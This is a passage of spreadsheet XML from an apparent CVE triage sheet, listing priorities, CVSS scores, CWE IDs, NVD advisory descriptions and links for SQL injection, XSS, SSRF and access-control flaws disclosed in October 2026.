        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105167</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The impacted element is an unknown function of the file admin/donate.php. Executing a manipulation of the argument location can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105167</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105169</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This impacts an unknown function of the file delivery/delivery.php of the component Take Order Handler. The manipulation of the argument order_id/delivery_person_id results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105169</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105170</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. Affected is an unknown function of the file admin/signup.php of the component Admin Signup. This manipulation of the argument sign causes missing authentication.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 s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105170</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105172</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode Online Admission System 1.0. Affected by this issue is some unknown functionality of the file /login1.php. Performing a manipulation of the argument User results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105172</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105175</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Drug Recommendation System 1.0. This issue affects some unknown processing of the file /Auth/add_student.php of the component Student Registration. The manipulation of the argument cmdschool results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105175</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105182</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in SourceCodester Online Reviewer Management System 1.0. Impacted is an unknown function of the file /reviewer_0/admins/assessments/activities/btn_functions.php?action=update. The manipulation of the argument Title results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105182</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105183</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in itsourcecode Online Admission System 1.0. The affected element is an unknown function of the file /admin/confirm.php. This manipulation of the argument schedid causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105183</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105184</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2026-10-05</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in itsourcecode Online Admission System 1.0. The impacted element is an unknown function of the file /admin/creteria.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105184</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105185</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode Online Admission System 1.0. This affects an unknown function of the file /admin/examinee.php. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105185</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105229</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2026-10-05</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This issue affects some unknown processing of the file signup.php of the component User Registration Endpoint. Executing a manipulation of the argument email/name/gender can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105229</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105230</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. Impacted is an unknown function of the file delivery/deliverymyord.php. The manipulation of the argument delivery_person_id/order_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105230</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105231</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The affected element is an unknown function of the file admin/signup.php of the component Admin Registration. The manipulation of the argument email/username/location results in sql injection. It is possible to launch the attack remotely. The exploit is now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T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105231</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105232</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The impacted element is an unknown function of the file delivery/deliverysignup.php of the component Registration Page. This manipulation of the argument username/email/location causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105232</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105238</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ChatGPTNextWeb NextChat up to 2.16.1. This vulnerability affects the function proxyHandler of the file app/api/proxy.ts of the component Proxy Fallback Handler. This manipulation of the argument x-base-url causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105238</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105246</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Online Reviewer Management System 1.0. Impacted is an unknown function of the file /reviewer_0/admins/assessments/Subject/btn_functions.php?action=update. Performing a manipulation of the argument Subject results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105246</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103062</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cozmoslabs TranslatePress translatepress-multilingual allows Stored XSS.This issue affects TranslatePress: from n/a through 3.3.6.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103062</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103344</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S4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45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103344</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103354</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liquid Web / StellarWP Gutenberg Blocks by Kadence Blocks kadence-blocks allows Stored XSS.This issue affects Gutenberg Blocks by Kadence Blocks: from n/a through 3.7.11.1.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103354</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97276</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP Statistics wp-statistics allows Reflected XSS.This issue affects WP Statistics: from n/a through 14.16.14.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97276</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100727</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>An improper access control vulnerability exists in GROWI, which allow an unauthenticated attacker to read files contained in non-public pages of the affected product when the file upload setting is configured as "Local".</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100727</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105306</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
